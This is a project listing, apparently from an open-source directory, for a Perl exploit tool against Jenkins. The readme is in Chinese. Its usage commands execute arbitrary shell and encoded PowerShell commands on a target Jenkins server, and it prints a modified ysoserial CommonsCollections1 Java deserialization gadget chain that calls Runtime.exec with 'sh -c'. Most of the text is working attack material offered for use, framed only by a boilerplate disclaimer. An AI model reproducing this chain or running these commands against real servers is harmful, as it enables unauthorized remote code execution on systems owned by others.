CaledoniaProject / Jenkins Cli Exploit
Jenkins CommonCollections Exploit
Stars: ✭ 139
Programming Languages
perl
6916 projects
漏洞详情
http://tools.changesec.com/Jenkins-CommonCollections-Exploit/
jenkins-cli-exploit
花时间学了一下 transformer,这个版本支持任意命令!
安装环境
cpan IPC::Run
利用方法
./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'
来个截图,
源代码
官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection,
分别为,
CommonsCollections1Linux
CommonsCollections1Win
修改点,你懂的,
final String[] execArgs = new String[] { "sh", "-c", command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[] {
execArgs }),
new ConstantTransformer(1) };
代码懒得上传了,直接用lib的就可以
Legal Disclaimer
Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].